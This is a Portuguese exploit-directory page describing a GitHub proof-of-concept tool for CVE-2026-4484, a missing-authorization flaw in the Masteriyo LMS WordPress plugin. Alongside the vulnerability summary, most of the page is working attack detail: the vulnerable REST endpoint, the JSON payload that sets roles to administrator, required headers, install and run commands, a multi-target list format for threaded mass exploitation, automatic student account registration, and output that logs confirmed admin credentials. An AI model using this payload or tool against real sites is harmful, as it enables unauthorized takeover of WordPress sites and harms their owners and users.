Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-4484 — Masteriyo LMS <= 2.1.6 - Falta de autorização que permite a usuários autenticados (Student+) escalada de privilégios para Administrador | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2026-4484
Autenticação e AutorizaçãoEscalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubnxploited/cve-2026-4484

CVE-2026-4484

Masteriyo LMS <= 2.1.6 - Falta de autorização que permite a usuários autenticados (Student+) escalada de privilégios para Administrador

Ver Repositório
11há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-4484

Masteriyo LMS <= 2.1.6 - Autorização Ausente para Escalação de Privilégios Autenticada (Aluno+) para Administrador

Typing SVG


🔴 Visão Geral da Vulnerabilidade

CVE-2026-4484 — Escalação de Privilégios Autenticada (Aluno → Administrador)

CampoDetalhes
ID do CVECVE-2026-4484
SeveridadeALTA — Pontuação CVSS v3.1: 8.8
VetorCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
Software AfetadoPlugin Masteriyo LMS para WordPress
Versões AfetadasTodas as versões até e incluindo 2.1.6
Tipo de VulnerabilidadeEscalação de Privilégios (Manipulação de Função)
Autenticação NecessáriaSim — Nível de Aluno ou superior
CWECWE-269: Gerenciamento Impróprio de Privilégios

Descrição:
O plugin Masteriyo LMS para WordPress é vulnerável a Escalação de Privilégios em todas as versões até, e incluindo, a 2.1.6. A vulnerabilidade se origina na função InstructorsController::prepare_object_for_database, que não restringe adequadamente a atribuição de funções (roles) durante requisições à API REST. Um atacante autenticado com apenas acesso de nível Aluno pode criar uma requisição POST especialmente formulada para o endpoint da API REST do Masteriyo — injetando "roles": ["administrator"] no corpo da requisição — para elevar silenciosamente sua conta para Administrador do WordPress, obtendo o controle total do site sem qualquer interação administrativa.


🛠️ Descrição da Ferramenta

Este é um script de exploração Proof-of-Concept (PoC) direcionado a instalações WordPress que executam uma versão vulnerável do plugin Masteriyo LMS. A ferramenta oferece suporte a dois modos de ataque:

ModoNomeFluxoCaso de Uso
1Nx_1Registrar → Login → Escalar → Verificar AdminAtaque do zero — nenhuma conta existente necessária
2Nx_2Login → Escalar → Verificar AdminConta existente disponível (Aluno/Instrutor)

Fluxo do Ataque

[Register / Login as Student]
         ↓
[Fetch Dashboard Context — user_id + nonce]
         ↓
[POST /wp-json/masteriyo/v1/users/instructors/{id}]
[Payload: {"roles": ["administrator"]}]
         ↓
[Re-login with fresh session]
         ↓
[Verify /wp-admin access → confirmed Administrator]
         ↓
[Write to Login_admin.txt]

📋 Requisitos

Requisitos do Sistema

  • Python 3.8 ou superior
  • Linux / Windows / macOS

Dependências Python

pip install requests urllib3 colorama

Ou via arquivo de requirements:

pip install -r requirements.txt

requirements.txt:

requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6

🚀 Instalação

# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-4484.git
cd CVE-2026-4484

# Install dependencies
pip install -r requirements.txt

# Run the tool
python3 CVE-2026-4484.py

⚙️ Uso

Execução Básica

python3 CVE-2026-4484.py

A ferramenta usa uma interface interativa de terminal — todos os parâmetros são solicitados em tempo de execução.


🗂️ Formato da Lista de Alvos

Crie um arquivo de texto simples (ex.: list.txt) com um alvo por linha:

https://target1.com
https://target2.com
http://target3.com/wordpress

🟥 Modo 1 — Nx_1 (Registrar + Login + Escalar)

Use este modo quando você não tiver uma conta existente no alvo. A ferramenta registra automaticamente uma nova conta de aluno e, em seguida, a escala.

Select mode (1=Nx_1, 2=Nx_2) [2]: 1
Targets list file (one host/URL per line) [list.txt]: list.txt
Threads (concurrent sites) [5]: 5
HTTP timeout (seconds) [10]: 10
Username to register (Nx_1) [Nxploited]: Nxploited
Email to use for registration+login (Nx_1) [[email protected]]: [email protected]
Password to use (Nx_1) [Nx_admin]: Nx_admin123!

Etapas executadas automaticamente:

  1. GET /account/signup/ → extrair nonce de registro
  2. POST /st/ → registrar nova conta como Aluno
  3. GET /account/ → extrair nonce de login
  4. POST /wp-admin/admin-ajax.php → fazer login via AJAX do Masteriyo
  5. GET /account/#/dashboard → extrair current_user_id + nonce
  6. POST /wp-json/masteriyo/v1/users/instructors/{id} com {"roles":["administrator"]}
  7. Refazer login com nova sessão → verificar acesso ao painel administrativo
  8. Gravar resultados confirmados em Login_admin.txt

🟩 Modo 2 — Nx_2 (Login + Escalar — Conta Existente)

Use este modo quando você já tiver uma conta válida de Aluno ou Instrutor no alvo.

Select mode (1=Nx_1, 2=Nx_2) [2]: 2
Targets list file (one host/URL per line) [list.txt]: list.txt
Threads (concurrent sites) [5]: 5
HTTP timeout (seconds) [10]: 10
Username or Email for login+escalation (Nx_2) [admin]: [email protected]
Password for that user: mypassword

Etapas executadas automaticamente:

  1. GET /account/ → extrair nonce de login
  2. POST /wp-admin/admin-ajax.php → fazer login via AJAX do Masteriyo
  3. GET /account/#/dashboard → extrair current_user_id + nonce
  4. POST /wp-json/masteriyo/v1/users/instructors/{id} com {"roles":["administrator"]}
  5. Refazer login com nova sessão → verificar acesso ao painel administrativo
  6. Gravar resultados confirmados em Login_admin.txt

📁 Arquivos de Saída

ArquivoDescrição
Login_admin.txtTodas as escalações de administrador confirmadas

Formato de Saída

https://target.com/wp-login.php user:[email protected]|pass:Nx_admin123!

Exemplo de Saída do Terminal

[OK]    https://target.com :: LOGIN OK :: success
[OK]    https://target.com :: DASHBOARD :: user_id=42 nonce=a1b2c3d4e5
[OK]    https://target.com :: ESCALATE SUCCESS :: user_id=42 username=nxploited roles=['administrator']
[OK]    https://target.com :: ADMIN SESSION VERIFIED (dashboard + plugin-install access).

🔍 Detalhes Técnicos

Endpoint Vulnerável

POST /wp-json/masteriyo/v1/users/instructors/{user_id}

Payload de Exploração

{
  "roles": ["administrator"]
}

Cabeçalhos Necessários

Content-Type: application/json
X-WP-Nonce: <extracted_from_dashboard>

Causa Raiz

A função InstructorsController::prepare_object_for_database no Masteriyo LMS processa o parâmetro roles do corpo da requisição REST sem verificar se o usuário solicitante possui a capacidade edit_users ou promote_users. Qualquer usuário autenticado (nível Aluno ou superior) que consiga acessar este endpoint pode enviar um valor de função (role) arbitrário — incluindo administrator — que é então persistido diretamente na tabela de metadados de usuário do WordPress.


📡 Contato e Autor

Baixar ferramenta